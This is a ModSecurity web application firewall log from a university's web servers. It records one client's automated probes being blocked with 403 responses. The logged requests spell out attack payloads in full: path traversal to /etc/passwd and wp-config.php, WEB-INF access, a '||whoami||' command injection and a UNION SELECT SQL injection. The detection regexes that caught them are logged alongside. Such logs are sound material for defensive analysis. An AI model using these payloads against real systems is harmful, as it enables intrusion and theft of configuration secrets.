[Tue Aug 29 11:42:08.380153 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAdZZo8AAAAf"]
[Tue Aug 29 11:42:08.391741 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAc@cWUAAAAL"]
[Tue Aug 29 11:42:08.409593 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAdcs8QAAAAC"]
[Tue Aug 29 11:42:08.437648 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAddJqAAAAAh"]
[Tue Aug 29 11:42:08.442258 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAcsLFUAAAAE"]
[Tue Aug 29 11:42:09.356683 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IcCo-f0AAAdcs8YAAAAC"]
[Tue Aug 29 11:42:09.364182 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13IcCo-f0AAAdaZNYAAAAM"]
[Tue Aug 29 11:42:09.388390 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdb7h0AAAAb"]
[Tue Aug 29 11:42:09.389021 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdKXNAAAAAK"]
[Tue Aug 29 11:42:09.390849 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IcCo-f0AAAcrilgAAAAB"]
[Tue Aug 29 11:42:09.401940 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAc-5zYAAAAN"]
[Tue Aug 29 11:42:09.403704 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAc92wAAAAAD"]
[Tue Aug 29 11:42:09.408781 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdUczUAAAAZ"]
[Tue Aug 29 11:42:10.386576 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IsCo-f0AAAdZZpIAAAAf"]
[Tue Aug 29 11:42:10.388063 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IsCo-f0AAAc36zkAAAAO"]
[Tue Aug 29 11:42:10.440533 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IsCo-f0AAAc-5zcAAAAN"]
[Tue Aug 29 11:42:11.378255 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdUczcAAAAZ"]
[Tue Aug 29 11:42:11.378256 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAddJqQAAAAh"]
[Tue Aug 29 11:42:11.384724 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdftQEAAAAG"]
[Tue Aug 29 11:42:11.385011 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAcsLFgAAAAE"]
[Tue Aug 29 11:42:11.390047 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAc@cWoAAAAL"]
[Tue Aug 29 11:42:11.403030 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdb7h8AAAAb"]
[Tue Aug 29 11:42:11.404225 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAc-5zkAAAAN"]
[Tue Aug 29 11:42:11.405717 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdSZKYAAAAX"]
[Tue Aug 29 11:42:11.431495 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAcsLFkAAAAE"]
[Tue Aug 29 11:42:11.431668 2023] [:error] [pid 1888] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdgyCgAAAAj"]
[Tue Aug 29 11:42:11.467974 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdSZKcAAAAX"]
[Tue Aug 29 11:42:12.395192 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JMCo-f0AAAddJqcAAAAh"]
[Tue Aug 29 11:42:12.401714 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdV7ZkAAAAa"]
[Tue Aug 29 11:42:12.424256 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdhHyQAAAAB"]
[Tue Aug 29 11:42:12.424649 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdaZN8AAAAM"]
[Tue Aug 29 11:42:12.424727 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdUczsAAAAZ"]
[Tue Aug 29 11:42:12.427639 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdTA-AAAAAY"]
[Tue Aug 29 11:42:13.385628 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JcCo-f0AAAdKXNYAAAAK"]
[Tue Aug 29 11:42:13.390087 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JcCo-f0AAAbo-a8AAAAi"]
[Tue Aug 29 11:42:14.355253 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAddJqsAAAAh"]
[Tue Aug 29 11:42:14.355957 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdQ3fEAAAAV"]
[Tue Aug 29 11:42:14.357527 2023] [:error] [pid 1891] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdjucQAAAAl"]
